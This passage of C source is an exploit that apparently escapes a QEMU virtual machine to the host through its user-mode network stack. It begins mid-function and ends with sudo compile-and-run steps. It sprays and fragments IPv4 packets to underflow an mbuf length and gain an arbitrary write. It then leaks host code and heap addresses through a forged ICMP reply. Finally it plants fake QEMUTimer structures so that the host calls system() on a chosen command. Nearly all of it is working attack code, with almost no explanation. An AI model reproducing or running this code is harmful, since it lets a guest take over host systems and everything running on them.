    send_ip4(target_id, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0x8, NULL, IP_MF);
    send_ip4(id++, 0x8, NULL, IP_MF);

    // Pivot Point
    size_t hole_1 = id++;
    send_ip4(hole_1, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0xC30, NULL, IP_MF);

    // For creating hole
    size_t hole_2 = id++;
    send_ip4(hole_2, 0x8, NULL, IP_MF);

    // To  prevent consolidation
    send_ip4(id++, 0x8, NULL, IP_MF);

    // This should create the first hole
    send_ip4(hole_1, 0x8, NULL, 0x1);

    // This should create the second hole
    send_ip4(hole_2, 0x8, NULL, 0x1);

    int m_data_off = -0x70;
    int m_len = m_data_off;
    addr = (void *)((size_t)addr + ((m_len * -1) - addrlen));
    if (addrlen != 0x8) {
      m_len -= (0x8 - addrlen);
    }

    size_t vuln_id = id++;

    char * pkt = Malloc(IP_MAXPACKET);
    memset(pkt,0x0,IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);

    u_int16_t pkt_len = 0xc90;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;

    // The mbuf of this packet will be placed in the second hole and
    // m_ext buff will be placed on the first hole, We will write wrt
    // to this.
    send_pkt(pkt,frame_length);

    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);
    pkt_len = 0x8;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;

    // Trigger the bug to change target's m_len
    send_pkt(pkt,frame_length);


    // Underflow and write, to change m_data
    char addr_buf[0x8] = {0};
    if (addrlen != 0x8) {
      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
    } else {
      memcpy(addr_buf,(char *)&addr,8);
    }
    send_ip4(target_id, 0x8, addr_buf, 0x1|IP_MF);
    send_ip4(target_id, size, payload, 0x2);

    hex_dump("Writing Payload ", payload, size);
}


void recv_leaks(){
  /* Prepare recv sd */
  /* Submit request for a raw socket descriptor to receive packets. */
  int recvsd, fromlen, bytes, status;
  struct sockaddr from;
  char recv_ether_frame[IP_MAXPACKET];
  struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN);
  struct icmphdr *recv_icmphdr =
      (struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);

  for (;;) {

    memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
    memset(&from, 0, sizeof(from));
    fromlen = sizeof(from);
    if ((bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0,
                          (struct sockaddr *)&from, (socklen_t *)&fromlen)) <
        0) {
      status = errno;
      // Deal with error conditions first.
      if (status == EAGAIN) { // EAGAIN = 11
        printf("Time out\n");
      } else if (status == EINTR) { // EINTR = 4
        continue; // Something weird happened, but let's keep listening.
      } else {
        perror("recvfrom() failed ");
        exit(EXIT_FAILURE);
      }
    } // End of error handling conditionals.

    // Check for an IP ethernet frame, carrying ICMP echo reply. If not, ignore
    // and keep listening.
    if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) &&
        (recv_iphdr->protocol == IPPROTO_ICMP) &&
        (recv_icmphdr->type == ICMP_ECHOREPLY) && (recv_icmphdr->code == 0) &&
        (recv_icmphdr->checksum == 0xffff)) {
      hex_dump("Received ICMP Reply : ", recv_ether_frame, bytes);

      code_leak = (void *)(*((size_t *)&recv_ether_frame[0x40]) - CPU_UPDATE_STATE);
      size_t *ptr = (size_t *)(recv_ether_frame + 0x30);
      for (int i = 0; i < (bytes / 0x8); i++) {
        if ((ptr[i] & 0x7f0000000000) == 0x7f0000000000) {
          heap_leak = (void *)(ptr[i] & 0xffffff000000);
          break;
        }
      }

      printf("Host Code Leak : %p\n", code_leak);
      printf("Host Heap Leak : %p\n", heap_leak);
      break;
    }
  }
}

void leak() {
    u_int32_t src_addr, dst_addr;
    src_addr = inet_addr(SRC_ADDR);
    dst_addr = inet_addr(DST_ADDR);

    /* Crafting Fake ICMP Packet For Leak */
    char * pkt = Malloc(IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    struct icmphdr * icmp = (struct icmphdr * )(pkt+ETH_HDRLEN+IP4_HDRLEN);
    ethernet_header(pkt);
    ip_header(ip,src_addr,dst_addr,ICMP_HDRLEN,IPPROTO_ICMP,0xbabe,IP_MF);

    ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN;
    ip->id = ntohs(ip->id);
    ip->frag_off = htons(ip->frag_off);

    icmp_header(icmp,NULL,0x0);
    char * data = (char *)icmp + ICMP_HDRLEN + 8;
    size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;

    spray_id = rand() & 0xffff;
    arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100);

    // This is same as the arbitrary write function
    spray_id = rand() & 0xffff;
    spray(0x8, 0x20);
    size_t id = spray_id + 0x20;

    size_t replay_id = id++;
    send_ip4(replay_id, 0x100, NULL, IP_MF);

    // Target
    size_t target_id = id++;
    send_ip4(target_id, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0x8, NULL, IP_MF);
    send_ip4(id++, 0x8, NULL, IP_MF);

    // Pivot Point
    size_t hole_1 = id++;
    send_ip4(hole_1, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0xC30, NULL, IP_MF);

    // For creating hole
    size_t hole_2 = id++;
    send_ip4(hole_2, 0x8, NULL, IP_MF);

    // Prevent Consolidation
    send_ip4(id++, 0x8, NULL, IP_MF);

    // This should create the first hole
    send_ip4(hole_1, 0x8, NULL, 0x1);

    // This should create the second hole
    send_ip4(hole_2, 0x8, NULL, 0x1);

    // Trigger the bug to change target's m_len
    int m_data_off = -0xd50;
    int m_len = m_data_off;
    size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe +  6) ;
    size_t addrlen = 0x3;

    if (addrlen != 0x8) {
      m_len -= (0x8 - addrlen);
    }

    size_t vuln_id = id++;

    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);

    pkt_len = 0xc90;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
    send_pkt(pkt,frame_length);


    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);
    pkt_len = 0x8;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
    send_pkt(pkt,frame_length);


    // Underflow and write to change m_data
    char addr_buf[0x8] = {0};
    if (addrlen != 0x8) {
      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
    } else {
      memcpy(addr_buf,(char *)&addr,8);
    }
    send_ip4(target_id, 0x8, addr_buf, 0x1);

  if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
      die("socket() failed to obtain a receive socket descriptor");
    send_ip4(replay_id, 0x8, NULL, 0x20);
    recv_leaks();


    char zero[0x28] = {0};
    spray_id = rand() & 0xffff;
    printf("Cleaning Heap\n");
    arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20);
}


void pwn() {
  char payload[0x200] = {0};
  struct QEMUTimerList *tl = (struct QEMUTimerList *)payload;
  struct QEMUTimer *ts =
      (struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList));

  char cmd[] = "/usr/bin/gnome-calculator";
  memcpy((void *)(payload + sizeof(struct QEMUTimerList )   
                             +sizeof(struct QEMUTimer )),  
                  (void *)cmd,sizeof(cmd));

  void * fake_timer_list = code_leak +  FAKE_STRUCT;
  void * fake_timer = fake_timer_list +  sizeof(struct QEMUTimerList);

  void *system = code_leak + SYSTEM_PLT;
  void *cmd_addr = fake_timer + sizeof(struct QEMUTimer);
  /* Fake Timer List */
  tl->clock = (void *)(code_leak + QEMU_CLOCK);
  *(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000;
  tl->active_timers = fake_timer;
  tl->le_next = 0x0;
  tl->le_prev = 0x0;
  tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB;
  tl->notify_opaque = 0x0;
  tl->timers_done_ev = 0x0000000100000000;

  /*Fake Timer structure*/
  ts->timer_list = fake_timer_list;
  ts->cb = system;
  ts->opaque = cmd_addr;
  ts->scale = 1000000;
  ts->expire_time = -1;

  spray_id = rand() & 0xffff;
  size_t payload_size =
      sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd);

  printf("Writing fake structure : %p\n",fake_timer_list);
  arbitrary_write(fake_timer_list,8,payload,payload_size,0x20);

  spray_id = rand() & 0xffff;
  void *  main_loop_tlg = code_leak + MAIN_LOOP_TLG;
  printf("Overwriting main_loop_tlg %p\n",main_loop_tlg);
  arbitrary_write(main_loop_tlg,8,(char *)&fake_timer_list,8,0x20);
}

int main() {
    initialize();
    leak();
    pwn();
    return 0;
}

Compile and run it as follows:

$ sudo ifconfig ens3 mtu 12000 up
$ gcc -o exp exp.c
$ sudo ./exp

(End)